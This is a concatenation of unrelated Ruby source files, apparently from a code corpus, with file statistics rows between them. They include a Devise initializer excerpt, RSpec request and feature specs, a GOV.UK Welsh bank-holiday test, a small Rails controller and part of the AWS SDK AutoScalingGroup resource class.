# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 10. If
# using other encryptors, it sets how many times you want the password re-encrypted.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# encryptor), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 10
# Setup a pepper to generate the encrypted password.
# config.pepper = '9fd871c5f6345dbe2abe322440bb942ab7602296a3d4ef8fdef9e1ca53b77d6b927688f11d732ff912bcedc3875b556b89465fe2d115288381a8dd9c07209b71'
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [ :email ]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 8..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
# config.email_regexp = /\A[^@]+@[^@]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# If true, expires auth token on session timeout.
# config.expire_auth_token_on_timeout = false
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [ :email ]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [ :email ]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# ==> Configuration for :encryptable
# Allow you to use another encryption algorithm besides bcrypt (default). You can use
# :sha1, :sha512 or encryptors from others authentication tools as :clearance_sha1,
# :authlogic_sha512 (then you should set stretches above to 20 for default behavior)
# and :restful_authentication_sha1 (then you should set stretches to 10, and copy
# REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using omniauth, Devise cannot automatically set Omniauth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.05 | 154 | 0.750333 |
085386e43e022a35efe2bfd39002e9cf2669bde5 | 785 | # frozen_string_literal: true
# Configure Rails Environment
ENV['RAILS_ENV'] = 'test'
require 'webmock/rspec'
# Run Coverage report
require 'solidus_dev_support/rspec/coverage'
require File.expand_path('dummy/config/environment.rb', __dir__)
# Requires factories and other useful helpers defined in spree_core.
require 'solidus_dev_support/rspec/feature_helper'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each { |f| require f }
# Requires factories defined in lib/solidus_klarna/factories.rb
require 'solidus_klarna/factories'
RSpec.configure do |config|
config.infer_spec_type_from_file_location!
config.use_transactional_fixtures = false
end
| 29.074074 | 80 | 0.794904 |
11413cabf5a8c28e491765953607a3fac54bc281 | 6,172 | # frozen_string_literal: true
require "rails_helper"
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to test the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
RSpec.describe "/event_attendees", type: :request do
let(:event_attendee) { create :event_attendee }
let(:user) { nil }
before(:each) do
sign_in user if user
end
describe "GET /index" do
subject(:get_index) { get event_attendees_url }
context "when user is logged in" do
let!(:event_attendee) { create_list :event_attendee, 2 }
let(:user) { event_attendee[0].profile.user }
it "renders a successful response" do
get_index
expect(response.body).to include(event_attendee[0].profile_id.to_s)
end
it "don't render other users records" do
get_index
expect(response.body).not_to include(event_attendee[1].profile_id.to_s)
end
end
end
describe "GET /show" do
subject(:get_show) { get event_attendee_url(event_attendee) }
it "renders a successful response" do
get_show
expect(response).to be_successful
end
end
describe "GET /new" do
subject(:get_new) { get new_event_attendee_url }
include_examples "redirect to sign in"
context "when user is logged in" do
let(:user) { create :user }
it "renders a successful response" do
get_new
expect(response).to be_successful
end
end
end
describe "GET /edit" do
subject(:get_edit) { get edit_event_attendee_url(event_attendee) }
include_examples "redirect to sign in"
context "when user does not match profile" do
let(:user) { create :user }
include_examples "unauthorized access"
end
context "when user matches profile" do
let(:user) { event_attendee.profile.user }
it "render a successful response" do
get_edit
expect(response).to be_successful
end
end
end
describe "POST /create" do
subject(:post_create) { post event_attendees_url, params: { event_attendee: attributes } }
context "with valid parameters" do
let(:profile) { create(:profile) }
let(:attributes) do
{
profile_id: profile.id,
event_id: create(:event).id
}
end
include_examples "redirect to sign in"
context "when user does not match profile" do
let(:user) { create :user }
include_examples "unauthorized access"
end
context "when user matches profile" do
let(:user) { profile.user }
it "creates a new EventAttendee" do
expect { post_create }.to change(EventAttendee, :count).by(1)
end
it "redirects to the created event_attendee" do
post_create
expect(response).to redirect_to(event_attendee_url(EventAttendee.last))
end
end
end
context "with invalid parameters and valid user" do
let(:attributes) { { profile_id: profile.id } }
let(:profile) { create(:profile) }
let(:user) { profile.user }
it "does not create a new EventAttendee" do
expect { post_create }.to change(EventAttendee, :count).by(0)
end
it "returns an unprocessable entity code" do
post_create
expect(response.status).to eq(422)
end
end
end
describe "PATCH /update" do
subject(:patch_update) { patch event_attendee_url(event_attendee), params: { event_attendee: attributes } }
let(:event_attendee) { create :event_attendee }
context "with valid parameters" do
let(:attributes) do
{ event_id: create(:event, name: "StrangeLoop").id }
end
include_examples "redirect to sign in"
context "when user does not match profile" do
let(:user) { create :user }
include_examples "unauthorized access"
end
context "when user matches profile" do
let(:user) { event_attendee.profile.user }
it "updates the requested event_attendee" do
patch_update
event_attendee.reload
expect(event_attendee.event.name).to eq "StrangeLoop"
end
it "redirects to the event_attendee" do
patch_update
expect(response).to redirect_to(event_attendee_url(event_attendee))
end
end
end
context "with invalid parameters and valid user" do
let(:attributes) { { event_id: nil } }
let(:user) { event_attendee.profile.user }
it "returns an unprocessable entity code" do
patch_update
expect(response.status).to eq(422)
end
it "updates the event name" do
patch_update
expect(event_attendee.reload.event.name).to eq "RubyConf"
end
end
end
describe "DELETE /destroy" do
subject(:delete_destroy) { delete event_attendee_url(event_attendee) }
let!(:event_attendee) { create :event_attendee }
include_examples "redirect to sign in"
context "when unrelated user" do
let(:user) { create :user }
include_examples "unauthorized access"
it "does not allow folks to delete others event attendance" do
delete_destroy
expect(event_attendee.id).to eq event_attendee.reload.id
end
end
context "when user matches profile" do
let(:user) { event_attendee.profile.user }
it "destroys the requested event_attendee" do
expect { delete_destroy }.to change(EventAttendee, :count).by(-1)
end
it "redirects to the event_attendees list" do
delete_destroy
expect(response).to redirect_to(event_attendees_url)
end
end
end
end
| 27.801802 | 111 | 0.66267 |
286ea850af164094d50e20da9f3226a8eb6b08a5 | 424 | # frozen_string_literal: true
module Settings
class MutedUsersController < ApplicationV6Controller
before_action :authenticate_user!
def index
@mute_users = current_user.mute_users.order(id: :desc)
end
def destroy
mute_user = current_user.mute_users.find(params[:mute_user_id])
mute_user.destroy
redirect_to settings_muted_user_list_path, notice: "ミュートを解除しました"
end
end
end
| 23.555556 | 70 | 0.745283 |
ab6a7ef015ee0b12939832afcde5c4132e344758 | 9,828 | require "integration_test_helper"
class GwyliauBancTest < ActionDispatch::IntegrationTest
setup do
content_item_cy = {
base_path: "/gwyliau-banc",
schema_name: "calendar",
document_type: "calendar",
locale: "cy",
}
stub_content_store_has_item("/gwyliau-banc", content_item_cy)
content_item_en = {
base_path: "/bank-holidays",
schema_name: "calendar",
document_type: "calendar",
}
stub_content_store_has_item("/bank-holidays", content_item_en)
end
should "display the Gwyliau Banc page" do
Timecop.travel("2012-12-14")
visit "/gwyliau-banc"
within("head", visible: false) do
assert page.has_selector?("title", text: "Gwyliau banc y DU - GOV.UK", visible: false)
desc = page.find("meta[name=description]", visible: false)
assert_equal "Dysgwch pryd mae gwyliau'r banc yng Nghymru, Lloegr, yr Alban a Gogledd Iwerddon - gan gynnwys gwyliau banc yn y gorffennol a'r dyfodol", desc["content"]
assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc.json']", visible: false)
assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/cymru-a-lloegr.json']", visible: false)
assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/cymru-a-lloegr.ics']", visible: false)
assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/yr-alban.json']", visible: false)
assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/yr-alban.ics']", visible: false)
assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/gogledd-iwerddon.json']", visible: false)
assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/gogledd-iwerddon.ics']", visible: false)
end
within "#content" do
within ".gem-c-title" do
assert page.has_content?("Gwyliau banc y DU")
end
within "article" do
within ".govuk-tabs" do
tab_labels = page.all("ul li a").map(&:text)
assert_equal ["Cymru a Lloegr", "yr Alban", "Gogledd Iwerddon"], tab_labels
end
within ".govuk-tabs" do
within "#cymru-a-lloegr" do
assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer Cymru a Lloegr at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/cymru-a-lloegr.ics")
assert_bank_holiday_table title: "Gwyliau banc i ddod yng Nghymru a Lloegr", year: "2012", rows: [
["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc i ddod yng Nghymru a Lloegr", year: "2013", rows: [
["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
["1 Ebrill", "Dydd Llun", "Llun y Pasg"],
["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
["26 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc blaenorol yng Nghymru a Lloegr", year: "2012", rows: [
["27 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["5 Mehefin", "Dydd Mawrth", "Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn (diwrnod amgen)"],
["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["9 Ebrill", "Dydd Llun", "Llun y Pasg"],
["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
["2 Ionawr", "Dydd Llun", "Dydd Calan (diwrnod amgen)"],
]
end
within "#yr-alban" do
assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer yr Alban at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/yr-alban.ics")
assert_bank_holiday_table title: "Gwyliau banc i ddod yn yr Alban", year: "2012", rows: [
["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc i ddod yn yr Alban", year: "2013", rows: [
["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
["2 Ionawr", "Dydd Mercher", "2il o Ionawr"],
["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
["5 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["2 Rhagfyr", "Dydd Llun", "Gŵyl Andreas (diwrnod amgen)"],
["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc blaenorol yn yr Alban", year: "2012", rows: [
["30 Tachwedd", "Dydd Gwener", "Gŵyl Andreas"],
["6 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["5 Mehefin", "Dydd Mawrth", "Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn (diwrnod amgen)"],
["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
["3 Ionawr", "Dydd Mawrth", "Dydd Calan (diwrnod amgen)"],
["2 Ionawr", "Dydd Llun", "2il o Ionawr"],
]
end
within "#gogledd-iwerddon" do
assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer Gogledd Iwerddon at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/gogledd-iwerddon.ics")
assert_bank_holiday_table title: "Gwyliau banc i ddod yng Ngogledd Iwerddon", year: "2012", rows: [
["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc i ddod yng Ngogledd Iwerddon", year: "2013", rows: [
["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
["18 Mawrth",
"Dydd Llun",
"Gŵyl Sant Padrig (diwrnod amgen)"],
["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
["1 Ebrill", "Dydd Llun", "Llun y Pasg"],
["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
["12 Gorffennaf", "Dydd Gwener", "Brwydr y Boyne (Dydd yr Orenwyr)"],
["26 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
]
assert_bank_holiday_table title: "Gwyliau banc blaenorol yng Ngogledd Iwerddon", year: "2012", rows: [
["27 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
["12 Gorffennaf", "Dydd Iau", "Brwydr y Boyne (Dydd yr Orenwyr)"],
["5 Mehefin",
"Dydd Mawrth",
"Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn"],
["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
["9 Ebrill", "Dydd Llun", "Llun y Pasg"],
["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
["19 Mawrth", "Dydd Llun", "Gŵyl Sant Padrig (diwrnod amgen)"],
["2 Ionawr", "Dydd Llun", "Dydd Calan (diwrnod amgen)"],
]
end
end
end
end
end
should "display the correct upcoming event" do
Timecop.travel(Date.parse("2012-01-03")) do
visit "/gwyliau-banc"
within ".govuk-tabs" do
within "#cymru-a-lloegr .govuk-panel" do
assert page.has_content?("Yr ŵyl banc nesaf yng Nghymru a Lloegr yw")
assert page.has_content?("6 Ebrill")
assert page.has_content?("Gwener y Groglith")
end
within "#yr-alban .govuk-panel" do
assert page.has_content?("Yr ŵyl banc nesaf yn yr Alban yw")
assert page.has_content?("heddiw")
assert page.has_content?("Dydd Calan")
end
within "#gogledd-iwerddon .govuk-panel" do
assert page.has_content?("Yr ŵyl banc nesaf yng Ngogledd Iwerddon yw")
assert page.has_content?("19 Mawrth")
assert page.has_content?("Gŵyl Sant Padrig")
end
end
end
end
context "showing bunting on bank holidays" do
should "show bunting when today is a buntable bank holiday" do
Timecop.travel(Date.parse("2nd Jan 2012")) do
visit "/gwyliau-banc"
assert page.has_css?(".app-o-epic-bunting")
end
end
should "not show bunting if today is a non-buntable bank holiday" do
Timecop.travel(Date.parse("12th July 2013")) do
visit "/gwyliau-banc"
assert page.has_no_css?(".app-o-epic-bunting")
end
end
should "not show bunting when today is not a bank holiday" do
Timecop.travel(Date.parse("3rd Feb 2012")) do
visit "/gwyliau-banc"
assert page.has_no_css?(".app-o-epic-bunting")
end
end
end
context "last updated" do
should "be translated and localised" do
Timecop.travel(Date.parse("25th Dec 2012")) do
visit "/gwyliau-banc"
within ".app-c-meta-data" do
assert page.has_content?("Diweddarwyd ddiwethaf: 25 Rhagfyr 2012")
end
end
end
end
end
| 46.140845 | 173 | 0.582316 |
ffb9694e806596a05fc15ed9c306f6a8e392e6f3 | 3,955 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Batch diffs', :js do
include MergeRequestDiffHelpers
include RepoHelpers
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project, source_branch: 'master', target_branch: 'empty-branch') }
before do
sign_in(project.first_owner)
visit diffs_project_merge_request_path(merge_request.project, merge_request)
wait_for_requests
# Add discussion to first line of first file
click_diff_line(find('.diff-file.file-holder:first-of-type .line_holder .left-side:first-of-type'))
page.within('.js-discussion-note-form') do
fill_in('note_note', with: 'First Line Comment')
click_button('Add comment now')
end
# Add discussion to first line of last file
click_diff_line(find('.diff-file.file-holder:last-of-type .line_holder .left-side:first-of-type'))
page.within('.js-discussion-note-form') do
fill_in('note_note', with: 'Last Line Comment')
click_button('Add comment now')
end
wait_for_requests
end
it 'assigns discussions to diff files across multiple batch pages' do
# Reload so we know the discussions are persisting across batch loads
visit page.current_url
# Wait for JS to settle
wait_for_requests
expect(page).to have_selector('.diff-files-holder .file-holder', count: 39)
# Confirm discussions are applied to appropriate files (should be contained in multiple diff pages)
page.within('.diff-file.file-holder:first-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('First Line Comment')
end
page.within('.diff-file.file-holder:last-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('Last Line Comment')
end
end
context 'when user visits a URL with a link directly to to a discussion' do
context 'which is in the first batched page of diffs' do
it 'scrolls to the correct discussion' do
page.within('.diff-file.file-holder:first-of-type') do
click_link('just now')
end
visit page.current_url
wait_for_requests
# Confirm scrolled to correct UI element
expect(page.find('.diff-file.file-holder:first-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_falsey
expect(page.find('.diff-file.file-holder:last-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_truthy
end
end
context 'which is in at least page 2 of the batched pages of diffs' do
it 'scrolls to the correct discussion',
quarantine: { issue: 'https://gitlab.com/gitlab-org/gitlab/-/issues/293814' } do
page.within('.diff-file.file-holder:last-of-type') do
click_link('just now')
end
visit page.current_url
wait_for_requests
# Confirm scrolled to correct UI element
expect(page.find('.diff-file.file-holder:first-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_truthy
expect(page.find('.diff-file.file-holder:last-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_falsey
end
end
end
context 'when user switches view styles' do
before do
find('.js-show-diff-settings').click
click_button 'Side-by-side'
wait_for_requests
end
it 'has the correct discussions applied to files across batched pages' do
expect(page).to have_selector('.diff-files-holder .file-holder', count: 39)
page.within('.diff-file.file-holder:first-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('First Line Comment')
end
page.within('.diff-file.file-holder:last-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('Last Line Comment')
end
end
end
end
| 35.954545 | 134 | 0.695322 |
ab34e1d451d9d2344b898956dd25a1b4d05c2faf | 269 | class RESO::Lookup::PoolFeature < RESO::Enumeration
has_many :pool_feature_assignments, foreign_key: :enumeration_id
has_many :reso_property_characteristics, through: :pool_feature_assignments, source: :enumerable, source_type: "RESO::Property::Characteristic"
end
| 53.8 | 145 | 0.825279 |
1c469ce850dbf77b56cd11e6c1ccdff572cbf660 | 49,215 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::AutoScaling
class AutoScalingGroup
extend Aws::Deprecations
# @overload def initialize(name, options = {})
# @param [String] name
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :name
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@name = extract_name(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def name
@name
end
alias :auto_scaling_group_name :name
# The Amazon Resource Name (ARN) of the Auto Scaling group.
# @return [String]
def auto_scaling_group_arn
data[:auto_scaling_group_arn]
end
# The name of the associated launch configuration.
# @return [String]
def launch_configuration_name
data[:launch_configuration_name]
end
# The launch template for the group.
# @return [Types::LaunchTemplateSpecification]
def launch_template
data[:launch_template]
end
# The mixed instances policy for the group.
# @return [Types::MixedInstancesPolicy]
def mixed_instances_policy
data[:mixed_instances_policy]
end
# The minimum size of the group.
# @return [Integer]
def min_size
data[:min_size]
end
# The maximum size of the group.
# @return [Integer]
def max_size
data[:max_size]
end
# The desired size of the group.
# @return [Integer]
def desired_capacity
data[:desired_capacity]
end
# The duration of the default cooldown period, in seconds.
# @return [Integer]
def default_cooldown
data[:default_cooldown]
end
# One or more Availability Zones for the group.
# @return [Array<String>]
def availability_zones
data[:availability_zones]
end
# One or more load balancers associated with the group.
# @return [Array<String>]
def load_balancer_names
data[:load_balancer_names]
end
# The Amazon Resource Names (ARN) of the target groups for your load
# balancer.
# @return [Array<String>]
def target_group_arns
data[:target_group_arns]
end
# The service to use for the health checks. The valid values are `EC2`
# and `ELB`. If you configure an Auto Scaling group to use ELB health
# checks, it considers the instance unhealthy if it fails either the EC2
# status checks or the load balancer health checks.
# @return [String]
def health_check_type
data[:health_check_type]
end
# The amount of time, in seconds, that Amazon EC2 Auto Scaling waits
# before checking the health status of an EC2 instance that has come
# into service.
# @return [Integer]
def health_check_grace_period
data[:health_check_grace_period]
end
# The date and time the group was created.
# @return [Time]
def created_time
data[:created_time]
end
# The suspended processes associated with the group.
# @return [Array<Types::SuspendedProcess>]
def suspended_processes
data[:suspended_processes]
end
# The name of the placement group into which to launch your instances,
# if any.
# @return [String]
def placement_group
data[:placement_group]
end
# One or more subnet IDs, if applicable, separated by commas.
# @return [String]
def vpc_zone_identifier
data[:vpc_zone_identifier]
end
# The metrics enabled for the group.
# @return [Array<Types::EnabledMetric>]
def enabled_metrics
data[:enabled_metrics]
end
# The current state of the group when the DeleteAutoScalingGroup
# operation is in progress.
# @return [String]
def status
data[:status]
end
# The termination policies for the group.
# @return [Array<String>]
def termination_policies
data[:termination_policies]
end
# Indicates whether newly launched instances are protected from
# termination by Amazon EC2 Auto Scaling when scaling in.
# @return [Boolean]
def new_instances_protected_from_scale_in
data[:new_instances_protected_from_scale_in]
end
# The Amazon Resource Name (ARN) of the service-linked role that the
# Auto Scaling group uses to call other AWS services on your behalf.
# @return [String]
def service_linked_role_arn
data[:service_linked_role_arn]
end
# The maximum amount of time, in seconds, that an instance can be in
# service.
#
# Valid Range: Minimum value of 0.
# @return [Integer]
def max_instance_lifetime
data[:max_instance_lifetime]
end
# Indicates whether Capacity Rebalancing is enabled.
# @return [Boolean]
def capacity_rebalance
data[:capacity_rebalance]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {AutoScalingGroup}.
# Returns `self` making it possible to chain methods.
#
# auto_scaling_group.reload.data
#
# @return [self]
def load
resp = @client.describe_auto_scaling_groups(auto_scaling_group_names: [@name])
@data = resp.auto_scaling_groups[0]
self
end
alias :reload :load
# @return [Types::AutoScalingGroup]
# Returns the data for this {AutoScalingGroup}. Calls
# {Client#describe_auto_scaling_groups} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the AutoScalingGroup exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (10)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (15)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_in_service(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupInService.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (15)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_not_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupNotExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @deprecated Use [Aws::AutoScaling::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
# Waiter will polls until it is successful, it fails by
# entering a terminal state, or until a maximum number of attempts
# are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
